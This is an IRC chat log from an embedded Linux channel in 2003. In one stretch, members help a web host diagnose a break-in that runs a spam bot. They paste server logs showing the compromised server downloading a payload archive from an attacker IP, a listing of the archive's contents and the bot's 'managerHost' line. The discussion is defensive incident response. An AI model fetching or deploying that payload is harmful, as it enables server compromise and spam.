irclog2html for #elinux on 20030204

00:08.22*** part/#elinux Rocinante ([5+adKfX28@12-254-194-122.client.attbi.com)
00:08.27*** join/#elinux TomW (tom@24.229.147.16)
00:10.19sjhillhi TomW
00:10.37TomWGood morning
00:10.40sjhillsorphin: wake up boy
00:11.01sjhillTomW: you old people don't keep track of time well do you?
00:11.05sjhill:)
00:11.07TomWI have been neck deep in 8051 code lately.  :/
00:11.11sjhillah
00:11.25sjhillyou have my condolences
00:11.50TomWI do cross development on GNU C, debug it with gdb, then shove it into the controller for final testing.
00:13.28TomWI have the dosemu loaded so I can run the old dos based C compiler / assembler.  My make file system modifies the autoexec.bat of the dosemu, then invokes dosemu, dosemu build the stuff then exits.  Pretty slick setup!
00:14.39TomWsjhill: I can use the linux command line utils to grep, cut, etc.. Also use the GNU make & perl to manage the whole process, and finally, use cvs to keep track of the changes.
00:14.59TomWsjhill: what's up?
00:16.34sjhillTomW: nothing, just trying to get things wrapped up before i leave for my new job this weekend...moving to pittsburgh
00:17.58TomWcool! You going to do some of the linux stuff I see advertised in the want ads?
00:20.43CosmicPenguinTomW: you see Linux stuff advertised in want ads?
00:21.50sjhillTomW: i'm going to work for TimeSys to hard real-time embedded linux....maybe real-time java eventually if they want me to
00:22.34CosmicPenguinreal time Java?  I understand those words, but do they go together?
00:22.58Lethalew. rt java. ew.
00:23.37Lethaltalk about having too much free time
00:24.00TomWCosmicPenguin: up at dice.com.  There is some embedded stuff going on in Pittsburg, Pa.
00:24.35TomWsjhill: yeah, I've seen the ads on dice.com for that Timesys company.
00:25.20TomWsjhill: I wonder how you got a job there?  Didn't they want a "linux guru", somebody like Allan Cox?
00:25.23TomWsjhill: heh
00:26.25CosmicPenguinTomW: sjhill probably falls in that category
00:26.51TomWok, just couldn't resist saying that!  :-D
00:30.00sjhillheh
00:30.28sjhillTomW: the interview process was a bit tough, but they hired Lethal which means they'll take about anyone
00:30.35sjhillheh
00:30.41TomWLOL!
00:31.07TomWReally desperate for talent, eh?  Sounds like my kind of situation!
00:31.34Lethalsjhill, erm. don't make me kick your ass.
00:32.35Lethalsjhill, manas might not even be in on the monday you start, so you might get lucky ;P
00:34.31sjhillLethal: why, would he inundate me with stuff?
00:35.40Lethalsjhill, doubt it. we already hired someone to attempt to make gdb not suck, so there's like 90% of the company engineering effort out the window :P
00:36.36sjhillheh
00:39.57TimRikerhow many are they hiring? do you have to be local?
00:40.24Lethalstill hiring selectively, and yes, unfortunately you have to be local :P
00:40.44TimRikersilicon valley, yes? /me does not care to move there.
00:40.58Lethalno, pittsburgh, pa.
00:41.02LethalI liked silicon valley considerably more.
00:41.20TangentHooray.. I have debian via nfs running on my tuxscreen and am sshing in :)...
00:41.26TangentNow time for some swapspace...
00:41.37TimRikerah. that's different. I'd consider pittsburg. got relatives in NY and philly.
00:41.50Lethalah
00:42.02Lethalwell, at least the cost of living here is cheap :P
00:42.27TimRikeryeah, that's the main reason I avoid silicon valley positions.
00:42.41TimRikercost of living is 214% what is is here.
00:42.48Lethalsilicon valley positions are great if you can work remotely ;P
00:43.39CosmicPenguinTimRiker: can't get much cheaper than SLC, unless you live in poedunk texas
00:44.06TimRikerlooks like pittsburg is 7% higher than Provo/Orem
00:44.33Lethalyeah, but whats there to do in slc? :P
00:44.42CosmicPenguinLethal: you would be surprised
00:44.44sorphinibot: cluebat sjhill
00:44.45ACTION pulls out a ClueBat (tm) and thwaps sjhill.
00:44.47TimRikerLethal: well then they aren't silicon valley positions are they? ;-)
00:45.28Lethalnot enough people hiring these days
00:46.20TimRikeroutskirts like "Plum" ... (where's that?) are actually cheaper than here. wow.
00:47.12Lethalplum isn't far from here. most places are really just suburbs.
00:47.12LethalI'm in monroeville.
00:47.19Lethalits pretty cheap here
00:47.22TimRikerwell, pass on a resume if they are interested http://rikers.org/resume.htm I'm off to dinner. flying to dallas for an interview this weekend.
00:48.00TimRikermonroeville shows +1.5% from here. not bad.
00:51.52TomWLethal: one of the reasons I moved to Pa 15 years ago, I could afford to live here!
00:53.55TangentHas anyone got an nbd module for strongarm ?
00:54.06LethalTomW, heh
00:54.09Tangent2.4.18-rmk6-tux1
00:54.32TomWTangent: didn't 2.4.18 have some bugs in it?
00:54.33LethalTomW, I moved here from san jose, so the housing costs were a nice surprise ;P
00:54.43TangentTomW: No idea... I'm obsolete
00:55.16TangentIf I can make swap work, I'll build a new kernel for it
00:55.32TomWLethal: WHEW!  Yeah, I know about the housing costs around San Jose.  I stayed in Santa Cruz about 30 years ago and San Jose was big-time expensive back then!
00:56.19TomWTangent: they are telling the mainstream linux users to upgrade to 2.4.19 because of some problem.
00:56.35Lethalsanta cruz is cool, I had some friends there, the commute just sucked :P
00:57.10TangentTomW: 6 months ago I upgraded to 2.4.18.. and today I got around to booting it..... That's why I'm reluctant to upgrade the kernel today...
00:57.23TangentIt'll just be a whole new load of hassles
00:57.51Lethalwow, I hate our mail system. I get one piece of spam, and then I get an automated mail from IT telling me I have spam.
00:57.52Lethalwtf.
00:58.13kergothspammed by IT. what else is new
00:58.14TangentWhat a sweet system :_
00:58.41TangentI get two bounce messages delivered to me for every piece of spam that fails to get delivered to non-existant users
00:58.54Lethalkergoth, its not so bad in small volume. but I just got half a dozen of them. most irritating.
00:59.11Lethalnot to mention, I don't need another piece of spam relaying the fact I have mail.
00:59.41Lethalthey need to limit this behavior to outlook folk.
00:59.53Lethalthey should be quarantined anyways.
01:08.15TangentMy mail goes through realtime blackhole list + amavis + sanitizer + spamassassin
01:08.46TangentThere's still about 2 a month that make it to the inbox tho'
01:08.52LethalI usually just filter out marketing + *@gnu.org to /dev/null and it cuts out about 90% of my spam
01:15.30Tangentibot tuxscreen kernel
01:15.31no idea, Tangent
01:15.39Tangentibot tuxscreen patches
01:15.40Tangent: parse error: dunno what the heck you're talking about
01:41.24TangentIs there not some convenient stash of pre-built kernels and modules for the tux?
01:47.29TomWTangent: to go back in version or up in version?
01:48.00TangentTomW: Either
01:48.18TangentTomW: either NBD modules for 2.4.18, or whole new kernel + nbd modules
01:50.18TomWfor the basic ARM stuff, goto  ftp://ftp.arm.linux.org.uk/pub/armlinux/source/kernel-patches/v2.4
01:52.51TomWTangent: check out: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/tuxscreen/buildroot-tux/make/linux.mk
01:53.12TomWTangent: Erik checked in the rmk-2.4.19 patches less than a day ago.
02:08.25TangentTomW: I've got buildroot going already... It's just that it takes _ages_
02:08.48TangentAnyhow.. I'm off to bed...
02:08.49TangentNight all
02:09.57jacques_gonehi
02:10.12jacquesi was at surpluscomputers again on sunday
02:10.18jacquesthey have webpals again
02:10.27jacques$12.95
02:10.38jacques$7.95 if you dont want the modem!
02:16.21TomWjacques: hello
02:17.06TomWjacques: really!  Guess you'll have to go to a computer show and purchase some old ISA stuff, eh?
02:17.55jacquesTomW: you mean to replace the modem?  
02:18.03jacquesdoes hte webpal have an isa slot?
02:20.46TomWjacques: yes, a limited one. Only has a single IRQ line for it.
02:24.03TomWjacques: a good site for the webpal is at: http://www.geocities.com/webpalstuff/
02:24.47TomWjacques: he does have a complete set of schematics, but they are in Eagle CAD.  You will have to download the freebie Eagle from: http://www.cadsoft.de
02:25.14TomWjacques: he did an excellent job of doing the schematics, really professional job!
02:47.18jacquescool
02:50.55MonMothathere are PDFs of the schematics up if you don't have eagle and are too lazy to install it (like me)
03:05.40*** join/#elinux scanline (~micah@aden2-42-dhcp.resnet.Colorado.EDU)
03:14.57sorphinscanline: heh, on ebay, all episodes of mavgyver, heh
03:15.06scanlinehehe
03:15.36sorphinscanline: the vcd ones are pricey as hell, someone has cheaper vhs in good shape (a few fulls)
03:46.25CosmicPenguinDamn turbotax site just went down
03:50.22anderseeCosmicPenguin: speaking of taxes... did you get that 1099 form?
04:01.38CosmicPenguinandersee: yeah... :)
04:01.48CosmicPenguinandersee: owe the gomment some money, I guess
04:08.10*** join/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com)
04:08.31RocinanteCosmicPenguin: I'll catch up with you in the morning...Things came up
04:19.44*** part/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com)
05:28.17*** join/#elinux ChanServ (ChanServ@services.)
05:28.17*** mode/#eLinux [+o ChanServ] by calvino.freenode.net
12:45.57*** join/#elinux mallum (~mallum@pc-80-193-218-21-hw.blueyonder.co.uk)
14:42.02*** join/#elinux GPSFan (~kenm@65.114.238.130)
14:52.20*** join/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com)
15:09.20CosmicPenguinMorning folks
15:22.40*** join/#elinux prpplague (~JoeBob1@12.148.134.9)
15:22.40*** mode/#eLinux [+o prpplague] by ChanServ
15:23.48sorphinCosmicPenguin: lo
15:23.52sorphinprpplague: morning dave
15:23.57prpplaguesorphin: hey
15:24.07prpplaguewhats up today guys?
15:24.13CosmicPenguinseņor POS!
15:24.37prpplaguesi
15:24.56sorphinprpplague: when i said yesterday i was getting prpplague type gear on ebay, i meant POS stuff ;) (specifically still trying to get a mag stripe reader i don't have to try and run through the fscking game port or shiz)
15:25.36sorphinheh
15:25.37sorphinComdex Operators File for Bankruptcy
15:25.49sorphingood thing i've never even been to it ;p
15:26.33prpplaguesorphin: ahh
15:27.07sorphinoen thing i hate about ebay sometimes.. something's 4 DAYS out
15:27.11sorphinand someone bids :P
15:27.23sorphinlike it's ending tomorrow or somehting ;p
15:27.50CosmicPenguinsorphin: newbies
15:28.01sorphinannoyances is more like
15:28.29sorphinCosmicPenguin: so since they made you stay, when can we expect pixil? ;)
15:30.24CosmicPenguinsorphin: check the address on my name - I am no longer an employee of Century Software
15:30.58prpplagueCosmicPenguin: ?
15:31.03prpplagueCosmicPenguin: you get axed?
15:31.35CosmicPenguinprpplague: yep
15:34.08prpplagueCosmicPenguin: damm
15:34.16prpplagueCosmicPenguin: overnight?
15:39.00CosmicPenguinprpplague: yesterday some time
15:39.17prpplagueCosmicPenguin: man
15:39.29prpplagueCosmicPenguin: so is it just greg now?
15:39.38CosmicPenguinprpplague: as far as engineers?  
15:39.49CosmicPenguinprpplague: my old supervisor Jason is still there, they are the programmers
15:40.11CosmicPenguinprpplague: anyway, I was given a month of consulting to finish up Pixil
15:40.31prpplagueCosmicPenguin: atleast thats something
15:49.10sorphinCosmicPenguin: layoff or fire ?
15:49.37prpplaguesorphin: fired, he got caught with too much pr0n on the company server :)
15:49.46sorphinprpplague: sound about right ;)
15:49.50sorphin+s
15:52.50CosmicPenguinsorphin: so what you are saying is that I *shouldn't* have mooned the CEO?
15:54.19sorphinCosmicPenguin: right
15:55.24prpplagueCosmicPenguin: did you beat yourself up like on fightclub?
15:55.56CosmicPenguinprpplague: no, but thats a good thought for next time... :)
15:56.39*** join/#elinux sieve (~sieve@12.148.134.9)
15:57.14sievemorning
15:57.19sorphinspeaking of people that need to be removed from employment, that shipping chick at abcsinc needs to be ;p
15:57.22prpplaguesieve: you get that memo about your tps reports?
15:58.01Rocinantesignal11: Thanks for setting up the forwarding
15:58.03prpplaguesorphin: lol, which reminds me, i need to get down there and get you guys stuff shipped
15:58.13signal11Rocinante: any time
15:58.22CosmicPenguinsignal11: do me a huge favor?
15:58.27signal11CosmicPenguin: sure
15:58.36CosmicPenguingo to cosmic and turn on the ssh server?
15:59.19sorphinCosmicPenguin: are you doing an sjhill? ;)
15:59.25CosmicPenguinsorphin: ??
15:59.41sorphinl33ching from the company before you go ;)
16:00.14CosmicPenguinsorphin: well, I am still technically a consultant - and I spent about 2 weeks getting my FVWM settings right, and I really don't want to do that again
16:00.27sorphinhehe
16:00.46sorphinhaven't used fvwm in years ;)
16:03.05kergothhey
16:03.19sorphinlo digichris
16:03.49prpplaguekergoth: the fun with netsilicon continues, had 3 voicemails this morning
16:03.49kergothman, putting my name and digi in the same word is just _mean_ :)
16:04.02kergothprpplague: damn, insistant bastards arent they
16:04.09prpplaguekergoth: no kidding
16:04.33prpplaguekergoth: "if you come to the trainning session you could win a free digi-connect!"
16:04.34sorphinkergoth: hey, you're the one htat works for em ;p
16:04.58kergothprpplague: oh wow! you better sign up for that! :P
16:06.02*** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com)
16:06.17Mornbloody hell
16:06.51sorphinMorn: ?
16:07.28prpplagueMorn: not destroying cell phones this morning are you?
16:07.34Mornsome joker keeps trying to use my web server to launch a spam attack
16:07.43sorphinMorn: been there, see that
16:07.44Mornprpplague: no, I lost my cell phone in a NYC cab yesterday
16:07.50sorphinMorn: you should see my web logs :P
16:07.53sorphinMorn: doh
16:07.57Mornsorphin: do you know how it works?
16:08.05MornI can't find the hole they are using
16:08.13Mornthey are uploading a perl script
16:08.22SmithMattpaste in some of your logs
16:08.23sorphinformmail.pl ?
16:08.29sorphinor such
16:08.34MornI see them TRYING to use that, but this is different
16:08.35sorphinthat's an old one
16:08.50sorphinthey're not trying to upload it
16:08.52sorphinthey're trying to USE it
16:08.59Mornflood alert
16:09.04MornHTTP request sent, awaiting response... 200 OK
16:09.05MornLength: 10,170 [application/x-tar]
16:09.05Morn<PROTECTED>
16:09.05Morn02:27:03 (18.09 KB/s) - `/tmp/af56j/archive.tgz' saved [10170/10170]
16:09.05Morntar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future
16:09.05Morngzip: stdin: unexpected end of file
16:09.07Morntar: Child returned status 1
16:09.09Morntar: Error exit delayed from previous errors
16:09.11Morntar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future
16:09.13Mornsh: line 1: /usr/bin/telnet: Permission denied
16:09.18Mornthat's in the /var/log/httpd/error_log
16:09.20sorphinummm
16:09.30sorphincute
16:09.38MornAnd I see that they are trying to use gcc and and stuff
16:09.46Mornbut I locked down the compilers and the network tools
16:09.53sorphinyou have a hole in your apache
16:10.00sorphinor that guestbook cgi
16:10.05Mornno shit
16:10.08SmithMatttotally.. they're already running stuff... they just haven't run the bomb yet.
16:10.10Mornno, they are uploading guestbook.cgi
16:10.17sorphinuhh
16:10.35Mornguestbook.cgi sets off a major spam attack
16:10.39sorphindon't allow POST :P
16:10.47Mornstarts like 70 processes spamming
16:10.54SmithMatta good place to start would be to kill apache...
16:11.00MornI can't kill apache
16:11.05sorphinupgrade apache, disable POST
16:11.11MornI run a business that requires apache
16:11.15Mornand I can't just turn off POST
16:11.20sorphinuhh
16:11.20Mornall the web forms would stop working
16:11.23SmithMattyou're running a spam business right now... pick one.
16:11.27sorphinthen *restrict* it :P
16:11.28Mornmy clients would shit
16:11.35SmithMattwhat apache version?
16:11.35MornI actually stopped the spam thing
16:11.58Mornit creates a dir in tmp named a56j or something I set the permissions unwritable for that dir
16:12.05Mornso it can't untar the spam attack
16:12.21sorphinheh
16:12.22Mornapache-1.3.26-6.1mdk
16:12.41sorphinthis is why i make my webserver unuseable to outsiders ;)
16:12.44MornI have the latest security updates from Mandrake
16:12.54Mornsorphin: I have paying web clients
16:13.00sorphinMorn: that's not what i mean
16:13.00sorphin:P
16:13.02Mornthe whole point is so outside users can use it
16:13.10sorphinyou misread what i say :P
16:13.33MornI'm trying to figure out how they are uploading the file
16:13.38Mornand as of yet I don't see it
16:13.41sorphinuhh
16:13.46sorphinpost prolly :P
16:13.47Mornit doesn't appear to be a bad cgi script
16:14.05sorphinit'd be in access_log prolly
16:14.06MornI don't see any POST's in the logs that would indicate this
16:14.14MornI did a grep on all posts
16:14.17sorphinwell, a GET can't push a file
16:14.24sorphinto the server
16:15.07Mornwww.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 317
16:15.11Mornwww.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.cgi HTTP/1.1" 404 318
16:15.11Mornthere are tons of those
16:15.15sorphinyup
16:15.24Mornbut they are all 404
16:15.28sorphinthat's the old one i was talking about
16:15.36MornI don't see any sucessful POST's that would result in this
16:15.43sorphintimestamp match against the error log :P
16:15.55MornI tried that
16:16.04sorphinsend me your logs, julie
16:16.12Mornthe FormMail requests happen very CLOSE to the other
16:16.29MornI saw
16:16.38MornI can't do that easily
16:16.51MornMy logs are HUGE and there are many of them
16:16.56sorphinumm
16:17.05sorphini only need the logs that have that time frame in them ;p
16:17.06MornI have 60 different web hosts running
16:17.37sorphinthat's nice.. i only need the applicable access/error logs from the "host" that was attacked
16:17.50Mornwhat address?
16:18.05Mornemail address that is
16:18.17sorphinthat one
17:10.49sorphinMorn: heh, ironic that yesterday there was a story on /. about cgi-shell, and you have a cgi exploit goin on ;p
17:16.49MornIs it possible to use a PUT to do this?
17:17.11sorphinmight be, forgot if there is a put
17:17.37MornI'm not sure it is CGI related
17:17.39Mornright now I just have no idea what the deal is
17:18.11sorphinheh
17:18.12sorphinPOST http://127.0.0.1:25/
17:18.15sorphinyou get some fun ones
17:18.17sorphini'll say htat ;p
17:18.29Mornyeah, all kinds of weird stuff in there
17:18.35sorphinCONNECT http://127.0.0.1:25/
17:18.42sorphini see people try and use my webserver as a proxy
17:20.30sorphinMorn: your access log doesn't go back far enough
17:20.39sorphinthis is from the 3rd, hte exploit was on the 1st
17:20.55Mornthe exploit happened again on the 3rd
17:21.00Mornaround 6am
17:21.08Mornthat's why I put the 3rd in there
17:21.16sorphinsheesh
17:21.23sorphinit happened a LOT
17:21.26Mornno shit
17:21.32Mornthat's why I'm worried
17:21.46MornI can't see how it's happening
17:21.54Mornthis is like driving blind
17:22.10sorphinlemme pull the archive thye're using
17:22.21MornI tried to find it on google
17:22.25MornI didn't have any luck
17:22.39MornI was trying to find something on how to do this
17:22.44Mornso I could plug it
17:23.04sorphinhaha
17:23.10sorphinyou're being attacked from russia :P
17:23.18Mornoh?
17:23.28sorphinyeah
17:23.33sorphinwhois on this IP :P
17:23.34sorphin217.106.122.58
17:23.43sorphindescr:        Stack Ltd.
17:23.43sorphindescr:        Russia, Siberia, Tomsk
17:24.32sorphineww.. use use suexec ?
17:24.37sorphinyou even
17:24.47Mornit's part of the default install
17:24.51MornI had plans to use it
17:24.57Mornbut I never did that project
17:24.59sorphinuntil you intend to do so
17:25.02sorphini'd turn it off
17:25.03sorphin:P
17:28.50*** join/#elinux TimRiker (timr@rikers.org)
17:28.51*** mode/#eLinux [+o TimRiker] by ChanServ
17:29.01sorphinTimRiker: hola
17:29.35TimRikerhola. como estas?
17:29.40sorphineh..
17:29.59sorphinTimRiker: trying to help Morn find how someone's getting this exploit through her webserver
17:30.17sorphinthe logs show no PUT/POST
17:30.22TimRikerooh.. sploits
17:30.25sorphinyup
17:31.21sorphinTimRiker: this look familiar? (incoming flood)
17:31.23sorphinwhich: no fetch in (/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin)
17:31.24sorphinguestbook.cgi: no process killed
17:31.24sorphinperl: no process killed
17:31.24sorphinsh: line 1: fetch: command not found
17:31.24sorphin--05:15:48--  http://217.106.122.58/archive.tgz
17:31.26sorphin<PROTECTED>
17:31.28sorphinConnecting to 217.106.122.58:80... connected.
17:31.30sorphinHTTP request sent, awaiting response... 200 OK
17:31.32sorphinLength: 92,695 [application/x-tar]
17:31.34sorphin<PROTECTED>
17:31.36sorphin<PROTECTED>
17:31.38sorphin05:15:49 (72.19 KB/s) - `/tmp/af56j/archive.tgz' saved [92695/92695]
17:31.40sorphintar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future
17:31.42sorphingzip: stdin: unexpected end of file
17:31.44sorphintar: Child returned status 1
17:31.46sorphintar: Error exit delayed from previous errors
17:31.48sorphintar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future
17:31.50sorphinls: /tmp/af56j/guestbook.cgi: No such file or directory
17:32.00sorphinthe technique that is
17:32.36sorphinit appears to be a perl script w/ some perl modules, cna't figure how they're stuffing it through.. i got sploited via DNS ages ago, but that was fixed w/ an upgrade
17:33.09sorphinooh
17:33.18sorphinsomeone was definately bored (as i look at this script)
17:33.23Mornas a temp fix I made the permissions on /tmp/af56j 000
17:34.16Mornbored?
17:34.29sorphinyeah, to go through the trouble of writing this crap
17:34.45Mornthe weird thing is it seems to clean up after itself
17:34.53MornI mean the original archive.tgz gets erased
17:34.58Mornwhatever it was trying to compile
17:35.11Mornand I killed the webserver before backing up that dir
17:35.12sorphinit's all perl
17:35.22sorphinthe guestbook bit
17:35.22Mornbut look, there are attempts to use gcc
17:35.28Mornwhich failed
17:35.46Mornbecause only the people with permission can run the compilers
17:35.50sorphinnot in the archive.tgz there aren't
17:35.55Mornand apache isn't in that list
17:35.59sorphinmaybe it grabs something else
17:36.10sorphinbut this archive is just a listener
17:36.10Morndid you find archive.tgz?
17:36.20sorphinyes
17:36.27sorphinit's in your logs julie
17:36.28Morncan you send it to me, or give me a link
17:36.40sorphin--07:33:57--  http://217.106.122.58/archive.tgz
17:36.44sorphinright there
17:36.49Morndoh!
17:36.52sorphin;)
17:36.54MornI'm an idiot
17:36.58sorphin:)
17:38.43Mornit couldn't use telnet either
17:38.49sorphinhehe
17:38.49Mornyou have to be in the ntools group for that
17:38.57sorphinrotfl
17:39.05sorphin</anal>
17:39.22Morn?
17:39.26sorphinyou
17:39.34sorphineverything in it's own lil groups
17:39.46MornThis could have been worse if I hadn't have done that
17:39.51sorphintrue
17:39.57sorphini never get to that point tho
17:40.21sorphinthe webserver does nothing but webserve
17:40.58sorphinbut everything is controlled
17:41.02Mornmy server is multifunctional
17:41.12Mornsince it is a shell server too
17:41.18sorphinheh
17:41.22sorphindiff box for that :P
17:41.25Mornwhich is part of the reason for the multiple group settings
17:41.34Morn500 users can get out of control
17:41.40sorphinuhhhh
17:41.45sorphinyou're nuts ;)
17:42.01Mornmy doctor would agree (giggle)
17:42.08sorphini'm sure :P
17:42.24Mornhe seems happy with the dvd I converted for him though
17:42.37Mornbut he really didn't understand a word I babbled about how I did it
17:42.41sorphinhehe
17:42.52sorphinstill not sure about my dvd2one probs
17:43.07Mornhis was the PAL->NTSC conversion
17:43.12MornI think it came out very nice
17:43.20sorphinhow'd you do it ?
17:43.57Mornthe actually conversion I used tmpgenc+ for
17:44.10Mornbut I did a lot of work to get the subtitles right
17:44.15Mornand keep the audio in sync
17:44.24sorphinnod
17:44.35Mornit takes tmpgenc a LONG time to do a PAL->NTSC conversion
17:44.40sorphinjulie
17:44.44Morn6.5 hours on my box for 1.5 hours of video
17:44.52sorphinit takes tmpgenc a long time to do ANYTHING :P
17:46.14MornIf I block that IP it'll help right?
17:46.16sorphinman this "sploit" as tim calls them, is humorous
17:46.29Mornthat way the script can't contact the 'managerHost' and get info
17:46.31sorphinit'll prevent them from pulling that file, yes
17:46.45sorphinand if the whole thing is coming from that IP
17:46.52sorphinyou'll block that too
17:46.56Mornwell, it contacts that ip for more than just the file
17:47.18sorphintaht's the stuff i want to see ;)
17:47.19Mornmy $managerHost="217.106.122.58";
17:47.23sorphini know
17:47.31sorphini wish i had a honeypot
17:47.38Morn?
17:47.55sorphina nice isolated, doesn't matter what happens to it box
17:48.01sorphinso i can watch this thing at work
17:48.51TimRikerany idea on user/group ownership for the sploit stuff?
17:48.53TimRikerdoes it look like a cgi script issue?
17:48.57TimRikeryou have looked for lame things like perl binaries in the cgi-bin directory etc I presume?
17:49.35sorphinTimRiker: here's what's in the archive
17:49.36MornI don't see any log entries showing how it uploaded the file
17:49.36sorphin-rwxrwxr-x zas/staff      5704 2003-02-04 01:28:27 guestbook.cgi
17:49.36sorphindrwxrwxr-x zas/staff         0 2003-02-02 04:03:22 lib/
17:49.36sorphindrwxrwxr-x zas/staff         0 2003-02-01 05:29:07 lib/Net/
17:49.36sorphin-r--rw-r-- zas/staff      8762 2003-02-03 04:11:16 lib/Net/SMTP.pm
17:49.36sorphin-r--rw-r-- zas/staff      9703 2003-02-03 04:11:35 lib/Net/Cmd.pm
17:49.38sorphin-r--rw-r-- zas/staff      3387 2003-02-03 04:11:26 lib/Net/Config.pm
17:49.40sorphin-rw-r--r-- zas/zas        3771 2003-02-03 04:10:56 lib/ForkManager.pm
17:49.48Mornjust a error message that it was uploaded
17:49.49sorphinwe can't figure how it's sneaking the file in tho
17:50.12Mornthere's nothing relavent in the logs other than the formmail searches around the times it happens
17:50.33Mornand that guestbook.cgi forks off a lot of processes
17:50.39MornI came home to a load of 30
17:50.45TimRikerwho is the zas user?
17:50.47Mornand 70 processes spamming everyone
17:51.06sorphinwhoever made that archive on the box it gets it from i guess
17:51.28TimRikeroh, is that a tar directory ? or an ls?
17:51.29sorphinTimRiker: http://217.106.122.58/archive.tgz
17:51.37sorphina tar
17:51.40sorphinthat's where it pulls it from
17:51.57sorphinsomething is causing her webserver to fetch that file from that IP
17:52.16MornI guess the best thing is to iptables block that ip
17:52.18sorphinMorn: i suspect suExec tho
17:52.34Mornhmmm
17:52.36sorphincuz i always see [Mon Feb  3 21:20:55 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbi
17:52.39sorphinright before hte exploit
17:52.46TimRikerwhat cgi scripts are installed on the webserver?
17:52.54sorphinTimRiker: she has suEXEC running
17:52.59sorphinTimRiker: which i don't trust
17:53.00MornTimRiker: A lot of stuff, I have commercial clients
17:53.11Mornlet me disable suExec
17:53.18TimRikerand the clients upload thier own cgi scripts?
17:53.38TimRikerI suspect a poorly written cgi script someplace.
17:53.51TimRikermany of those are easy to exploit.
17:54.19MornI have a central cgi-bin for most stuff
17:54.25Mornbut I gave a few clients their own
17:54.34Mornbut with all the stuff it's hard to keep up with it
17:55.58TimRikergiving folks cgi access is effectively giving them shell access. and if they write bad scripts, then you might be giving the world shell access.
17:56.20Mornall the users already have shell access
17:56.24Morn500 shell users
17:56.40Mornbut only 2 have their own cgi-bin
17:56.47Mornthe rest have to send scripts to me first
17:57.02MornI try to encourage the use of php instead of perl scripts
17:57.17MornYou know I don't see where to turn off suexec
17:57.22*** join/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net)
17:57.51*** part/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net)
17:59.02sorphinhmm.. all my logs have are codered/nimda and that formmail
17:59.05sorphini feel left out ;)
18:00.21sorphinMorn: http://httpd.apache.org/docs/suexec.html
18:00.55Mornand if it was something like that I would expect others to be seeing this too
18:01.33sorphini don't think many people leave their apache "Default"
18:01.36sorphini build my own ;p
18:02.42MornI do a bit, but I leave some alone
18:02.52MornI don't think it is suexec though
18:02.52Mornsince the process runs as the apache user
18:03.09sorphinonly thing i can thikn of atm
18:04.25sorphinmight wanna bump up your logging?
18:05.18Mornsuexec is removed
18:06.11MornLogLevel debug ??
18:06.41sorphinthat should help
18:06.52sorphinset it only for your webserver only
18:06.54sorphinnot any vhosts
18:07.01Mornright
20:02.16*** join/#elinux ibot (ibot@rikers.org)
20:02.16*** topic/#elinux is Embedded Linux || http://eLinux.org/ || cross compile, uClibc, busybox, tinylogin, handhelds, post-sale linux installs ;-), etc. || debian-handheld list is up.
20:02.16*** mode/#eLinux [+o ibot] by ChanServ
20:12.31sorphinibot: wb
20:12.32It's great to be back!
20:33.59*** join/#elinux sjhill (~NOYB@207-191-210-241.cpe.ats.mcleodusa.net)
20:34.06prpplaguesjhill: lo ho
20:34.19prpplaguesjhill: are you still a jobless bum?
20:34.31sjhillprpplague: nope, moving to pittsburgh this weekend
20:34.41prpplaguesjhill: pittsburgh? eww
20:34.55sjhillprpplague: it's getting to be a nice city
20:35.18prpplaguesjhill: what kinda job?
20:35.41sjhillprpplague: TimeSys - real-time embedded Linux
20:35.47prpplaguesjhill: cool
20:36.01prpplaguesjhill: congrads
20:36.06*** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) [NETSPLIT VICTIM]
20:36.07sjhillthx
20:36.14sjhillhi sorphin
20:36.16prpplaguesjhill: $250k/year right?
20:36.19sjhilllo' Lethal
20:36.35sjhillprpplague: heh, no, but i got my same salary i had at Broadcom...so i'm happy
20:36.56prpplaguesjhill: what about moving expenses?
20:40.08sjhillall covered
20:40.12sorphinsjhill: lo
20:40.42sjhillbbl guys
20:41.14CosmicPenguin32 people... arn't we popular
20:57.41*** part/#elinux da-ve (~dave@212.204.35.114)
21:10.41theDevil-hehe
21:16.54sorphin<theDevil-> made me do it :P
21:21.52kergothibot: perl's buildsystem
21:21.53methinks perl's buildsystem is the devil!
21:21.57kergothheheh
21:24.31sorphinheh
21:24.35sorphinRick Berman Doesn't Know Why Nemesis Tanked
21:24.41sorphinbecause Rick Berman sucks
21:27.31prpplagueya get a clue
21:27.53sorphinibot: digi
21:27.53sorphin: have you tried http://www.tldp.org/ ?
21:27.57sorphinbah
21:28.20sorphinibot: digi is hell, and kergoth is it's slave.
21:28.21okay, sorphin
21:28.27kergothtruee that
21:28.28sorphinibot: digi?
21:28.28[digi] hell, and kergoth is it's slave.
21:28.38sorphindoh
21:28.55sorphinibot: no digi is digi is hell, and kergoth is its slave.
21:28.56sorphin: I think you lost me on that one
21:29.03sorphinibot: forget digi
21:29.03i forgot digi, sorphin
21:29.06kergothneed a comma after the no
21:29.10sorphinibot: digi is digi is hell, and kergoth is its slave.
21:29.10I think you lost me on that one, sorphin
21:29.27sorphinibot: digi is hell and kergoth is its slave.
21:29.28okay, sorphin
21:29.34sorphinibot: digi
21:29.34digi is, like, hell and kergoth is its slave.
21:29.39sorphincoo
22:06.59*** join/#elinux TheMasterMind1 (foobar@h-69-3-152-153.MCLNVA23.covad.net)
22:58.33*** part/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com)
23:04.27pattiejakergoth: I called DataComm Warehouse about the Magnia SG20 server
23:04.42kergothpattieja: ah, what'd they have to say?
23:05.04pattiejakergoth: they couldn't give me an answer on the discrepancy between them selling the units for $300 and Toshiba (the vendor) selling them for $1400
